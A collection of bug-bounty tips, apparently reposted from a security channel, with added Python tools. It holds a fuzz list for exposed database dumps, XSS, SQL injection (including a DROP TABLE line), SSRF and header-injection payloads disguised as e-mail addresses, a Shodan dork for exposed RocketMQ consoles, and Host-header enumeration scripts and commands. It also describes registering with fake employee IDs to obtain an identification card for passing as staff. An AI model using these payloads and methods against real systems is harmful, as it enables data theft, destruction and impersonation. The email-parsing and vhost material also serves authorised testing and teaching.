#Bug_Bounty_Tips_14
🛡BugBounty_Tips
🔺Here’s a quick tip to find forgotten database dumps using this small but quick fuzz list:
/back.sql
/backup.sql
/accounts.sql
/backups.sql
/clients.sql
/customers.sql
/data.sql
/database.sql
/database.sqlite
/users.sql
/db.sql
/db.sqlite
/db_backup.sql
/dbase.sql
/dbdump.sql
/setup.sql
/sqldump.sql
/dump.sql
/mysql.sql
/sql.sql
/temp.sql
🔰Old database dumps may contain all kinds of interesting information – user credentials, configuration settings, secrets and API keys, customer data and more. Many targets answer 200 with a catch-all page for any path, so check that the body really is a dump before reporting it.
☣️@InfoSecTube
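As an added example (not part of the original tip), here is a small Python probe that walks the list above and keeps only the 200 responses whose body actually looks like a SQL or SQLite dump, reading a bounded prefix so a multi-gigabyte hit does not get downloaded in full. The target URL, user agent and the sample responses in the test are assumptions for illustration; the `fetcher` argument is injectable so the classification logic can be exercised offline.

```python
# Added example, not from the original tip: probe the fuzz list and keep only
# responses that look like a real dump (status 200 alone is not enough).
import sys
import urllib.error
import urllib.request

# The tip's wordlist, normalised to absolute paths.
DUMP_PATHS = [
    "/back.sql", "/backup.sql", "/accounts.sql", "/backups.sql", "/clients.sql",
    "/customers.sql", "/data.sql", "/database.sql", "/database.sqlite",
    "/users.sql", "/db.sql", "/db.sqlite", "/db_backup.sql", "/dbase.sql",
    "/dbdump.sql", "/setup.sql", "/sqldump.sql", "/dump.sql", "/mysql.sql",
    "/sql.sql", "/temp.sql",
]

# Byte signatures that real dumps carry near the start of the file.
SQLITE_MAGIC = b"SQLite format 3\x00"
SQL_MARKERS = (
    b"-- MySQL dump", b"-- phpMyAdmin SQL Dump", b"-- PostgreSQL database dump",
    b"CREATE TABLE", b"INSERT INTO", b"DROP TABLE",
)


def classify_body(body: bytes, content_type: str = "") -> str:
    """Classify a response prefix as 'sqlite', 'sql', 'html' or 'unknown'."""
    head = body[:8192]
    if head.startswith(SQLITE_MAGIC):
        return "sqlite"
    lead = head.lstrip()[:256].lower()
    if lead.startswith((b"<!doctype", b"<html")):
        return "html"                      # catch-all / soft-404 page, not a dump
    if any(marker in head for marker in SQL_MARKERS):
        return "sql"
    if "text/html" in content_type.lower():
        return "html"
    return "unknown"


def fetch(url: str, timeout: float = 10.0, max_bytes: int = 65536):
    """GET url and return (status, content_type, body_prefix); 0 on network error."""
    req = urllib.request.Request(url, headers={"User-Agent": "dump-probe/1.0"})  # assumed UA
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.headers.get("Content-Type", ""), resp.read(max_bytes)
    except urllib.error.HTTPError as err:
        return err.code, err.headers.get("Content-Type", ""), err.read(max_bytes)
    except (urllib.error.URLError, OSError):
        return 0, "", b""


def probe(base_url: str, paths=DUMP_PATHS, fetcher=fetch):
    """Return [(url, kind)] for paths whose 200 response looks like a dump."""
    hits = []
    for path in paths:
        url = base_url.rstrip("/") + path
        status, ctype, body = fetcher(url)
        if status != 200:
            continue
        kind = classify_body(body, ctype)
        if kind in ("sql", "sqlite"):
            hits.append((url, kind))
    return hits


if __name__ == "__main__":
    # Placeholder target; pass the real base URL as the first argument.
    target = sys.argv[1] if len(sys.argv) > 1 else "https://target.example"
    for url, kind in probe(target):
        print(f"[{kind}] {url}")
```

Run it as `python3 probe.py https://target.example`; only hits whose body starts with the SQLite magic or carries a SQL dump marker are printed, which filters out the HTML catch-all pages that make raw status-code fuzzing noisy.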
#Bug_Bounty_Tips_15
🛡BugBounty_Tips
🌀The following payloads are all syntactically valid e-mail addresses (RFC 5322 permits quoted-string local parts, comments and domain literals), so they pass well-formedness checks and can be used when pentesting anything that accepts an e-mail address, not only web-based e-mail systems.
🔺XSS (Cross-Site Scripting):
test+(<script>alert(0)</script>)@example.com
test@example(<script>alert(0)</script>).com
"<script>alert(0)</script>"@example.com
🔺Template injection:
"<%= 7 * 7 %>"@example.com
test+(${{7*7}})@example.com
🔺SQL injection:
"' OR 1=1 -- '"@example.com
"mail'); DROP TABLE users;--"@example.com
🔺SSRF (Server-Side Request Forgery):
[email protected]
john.doe@[127.0.0.1]
🔺Parameter pollution:
victim&[email protected]
🔺(Email) header injection:
"%0d%0aContent-Length:%200%0d%0a%0d%0a"@example.com
"[email protected]>\r\nRCPT TO:<victim+"@test.com
☣️@InfoSecTube
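Why these strings are valid addresses, shown as an added example that is not from the original tip: a small Python parser for the RFC 5322 addr-spec grammar that handles quoted-string local parts, nested comments and domain literals, and reports which of those features an address uses, since that is exactly where the payload hides. It is deliberately permissive about where comments may appear (the obsolete syntax the `example(...).com` payload relies on) and, as a design choice of mine, rejects raw CR/LF. The `is_plain_mailbox` policy function at the end is my suggestion for applications that only need ordinary mailboxes; an address that passes it still has to be treated as untrusted data (output encoding, parameterised queries, no raw use in SMTP commands).

```python
# Added example, not from the original tip: an RFC 5322 addr-spec parser that
# shows why the payloads above are "valid" and which syntax carries them.
import re

# RFC 5322 atext: characters allowed in an unquoted local part or domain label.
ATEXT = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
    "!#$%&'*+-/=?^_`{|}~"
)
DOT_ATOM_DOMAIN = re.compile(r"[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*")


def _skip_comment(s: str, i: int) -> int:
    """s[i] is '('. Return the index just past the matching ')'; comments nest."""
    depth = 0
    while i < len(s):
        c = s[i]
        if c == "\\":                       # quoted-pair inside a comment
            i += 2
            continue
        if c == "(":
            depth += 1
        elif c == ")":
            depth -= 1
            if depth == 0:
                return i + 1
        i += 1
    raise ValueError("unbalanced comment")


def _read_quoted(s: str, i: int):
    """s[i] is '"'. Return (unescaped content, index past the closing quote)."""
    out, i = [], i + 1
    while i < len(s):
        c = s[i]
        if c == "\\" and i + 1 < len(s):    # quoted-pair: \x stands for x
            out.append(s[i + 1])
            i += 2
            continue
        if c == '"':
            return "".join(out), i + 1
        if c in "\r\n":                     # design choice: no folding whitespace
            raise ValueError("CR/LF in quoted string")
        out.append(c)
        i += 1
    raise ValueError("unterminated quoted string")


def parse_addr_spec(addr: str) -> dict:
    """Parse local@domain into {'local', 'domain', 'flags'} or raise ValueError.

    flags is a frozenset drawn from {'quoted', 'comment', 'domain_literal'}:
    the syntax features that let a payload survive as a well-formed address.
    """
    flags, local, domain, i, n = set(), [], [], 0, len(addr)
    while i < n and addr[i] != "@":                    # local-part
        c = addr[i]
        if c == "(":
            flags.add("comment")
            i = _skip_comment(addr, i)
        elif c == '"':
            flags.add("quoted")
            text, i = _read_quoted(addr, i)
            local.append(text)
        elif c in ATEXT or c == ".":
            local.append(c)
            i += 1
        elif c in " \t":                               # whitespace around comments
            i += 1
        else:
            raise ValueError(f"illegal {c!r} in local part")
    if i >= n:
        raise ValueError("missing '@'")
    i += 1
    while i < n:                                       # domain
        c = addr[i]
        if c == "(":
            flags.add("comment")
            i = _skip_comment(addr, i)
        elif c == "[":                                 # domain-literal: [127.0.0.1]
            j = addr.find("]", i)
            if j < 0:
                raise ValueError("unterminated domain literal")
            flags.add("domain_literal")
            domain.append(addr[i:j + 1])
            i = j + 1
        elif c in ATEXT or c == ".":
            domain.append(c)
            i += 1
        elif c in " \t":
            i += 1
        else:
            raise ValueError(f"illegal {c!r} in domain")
    local_s, domain_s = "".join(local), "".join(domain)
    if not local_s or not domain_s:
        raise ValueError("empty local part or domain")
    if "domain_literal" not in flags and not DOT_ATOM_DOMAIN.fullmatch(domain_s):
        raise ValueError("malformed domain")
    return {"local": local_s, "domain": domain_s, "flags": frozenset(flags)}


def is_valid_addr_spec(addr: str) -> bool:
    try:
        parse_addr_spec(addr)
        return True
    except ValueError:
        return False


def is_plain_mailbox(addr: str) -> bool:
    """Policy (mine): accept only dot-atom@dot-atom, no quotes, comments or literals."""
    return is_valid_addr_spec(addr) and not parse_addr_spec(addr)["flags"]
```

Note what the parser returns for `"<script>alert(0)</script>"@example.com`: the local part *is* the payload, so a validator that only checks the address shape and then stores or echoes the local part has validated nothing useful. Rejecting the three flagged features removes every payload in the tip without rejecting a normal mailbox.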
#Bug_Bounty_Tips_16
🛡BugBounty_Tips
🌀Registering as an employee lets us claim employee-only private offers and ultimately obtain an “Identification Card”.
Methodology:
1-Searched for the Target‘s employee offers on Google:
inurl:"Target Name" employee offers
2-Found a website which provides offers to the Target’s employees.
3-Found that the offers were restricted to employees only.
4-Tried registering with random numbers in the “Employee ID” field.
5-Successfully registered as an employee because the “Employee ID” is not verified at all.
6-Registering as an employee allows claiming the private offers.
7-The website also issues an “Identification Card” which could be used to pass as a legitimate employee of the Target.
☣️@InfoSecTube
#Bug_Bounty_Tips_17
🛡BugBounty_Tips
Here’s an example of an exposed RocketMQ console.
RocketMQ is a distributed messaging and streaming platform (low latency, high throughput, very large capacity and flexible scalability).
This time we pull up RocketMQ consoles, which often disclose quite confidential production information, using this Shodan dork:
org:target.com http.title:rocketmq-console
From the exposed RocketMQ consoles we can for example find out:
1-Additional hostnames and subdomains
2-Internal IP addresses
3-Log file locations
4-Version details
5-etc
#Bug_Bounty_Tips_18
🛡BugBounty_Tips
🌀Want to find critical bugs by changing a single header? Set the ‘Host’ header to ‘localhost’ in your next directory bruteforce; the results might be surprising! You might gain access to:
1️⃣Special features
2️⃣Internal endpoints
3️⃣Config files, SSL keys
4️⃣Directory listing, …
We can even take this a step further and try to identify all sites that are hosted on the target web server by performing virtual host enumeration. How to enumerate virtual hosts? We could use tools such as these:
ffuf
https-vhosts
virtual-host-discovery
Note that we could also use curl or wget:
curl -v -H "Host: localhost" https://target/
wget -d --header="Host: localhost" https://target/
☣️@InfoSecTube
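The Host-header trick and the virtual-host enumeration described above, as an added example that is not from the original tip or from any of the tools listed: a Python enumerator that compares each candidate name against the response for a random, certainly non-existent name (the same idea as filtering on response size in ffuf), plus a directory check that reports paths answering differently under `Host: localhost` than under the public name. It runs against a constructed in-process demo server so it works offline; the host names, paths and responses are made up for illustration.

```python
# Added example, not from the original tip: Host-header vhost enumeration with
# a baseline diff, demonstrated against a constructed local server.
import secrets
import threading
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer


class _DemoVhostHandler(BaseHTTPRequestHandler):
    """Constructed target: routes on the Host header the way a real server does."""
    ROUTES = {
        ("localhost", "/"): b"default vhost: localhost\n",
        ("localhost", "/admin/"): b"internal admin panel (config, keys)\n",
        ("staging.target.test", "/"): b"staging site\n",
    }

    def do_GET(self):
        host = self.headers.get("Host", "").split(":")[0]
        body = self.ROUTES.get((host, self.path))
        if body is None and self.path == "/":
            body = b"public site\n"         # any unknown name lands on the public site
        code = 200 if body is not None else 404
        body = body or b"not found\n"
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):       # keep the demo quiet
        pass


def start_demo_server():
    """Bind the demo on 127.0.0.1 with an ephemeral port; returns (server, port)."""
    srv = ThreadingHTTPServer(("127.0.0.1", 0), _DemoVhostHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def fetch(ip, port, vhost, path="/", timeout=5.0):
    """GET path from ip:port with an arbitrary Host header; returns (status, length)."""
    conn = HTTPConnection(ip, port, timeout=timeout)
    try:
        conn.request("GET", path, headers={"Host": vhost})
        resp = conn.getresponse()
        return resp.status, len(resp.read())
    finally:
        conn.close()


def enumerate_vhosts(ip, port, candidates, path="/"):
    """Candidate names whose response differs from a surely-unknown Host value."""
    baseline = fetch(ip, port, f"{secrets.token_hex(4)}.invalid", path)
    hits = []
    for name in candidates:
        status, length = fetch(ip, port, name, path)
        if (status, length) != baseline:
            hits.append((name, status, length))
    return hits


def host_header_dirbust(ip, port, vhost, paths, public_host):
    """Paths that answer differently under vhost than under the public name."""
    hits = []
    for path in paths:
        under_vhost = fetch(ip, port, vhost, path)
        if under_vhost != fetch(ip, port, public_host, path):
            hits.append((path, *under_vhost))
    return hits


if __name__ == "__main__":
    srv, port = start_demo_server()
    names = ["www.target.test", "staging.target.test", "localhost", "dev.target.test"]
    print("vhosts:", enumerate_vhosts("127.0.0.1", port, names))
    print("localhost-only paths:", host_header_dirbust(
        "127.0.0.1", port, "localhost", ["/", "/admin/", "/backup.sql"], "www.target.test"))
    srv.shutdown()
```

Against a real target, point `fetch` at the server's IP and feed `enumerate_vhosts` a subdomain wordlist. For HTTPS swap in `http.client.HTTPSConnection`, and keep in mind that the TLS SNI will still carry the connection hostname while the Host header carries the candidate, so a server that routes on SNI rather than Host will not be fooled (the same limitation applies to `curl -H "Host: ..."`).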
#Bug_Bounty_Tips_19
🛡BugBounty_Tips
🌀Javascript polyglot for XSS
Note that we may only need a certain portion of the polyglot, depending on our situation. Do not copy & paste blindly.
☣️@InfoSecTube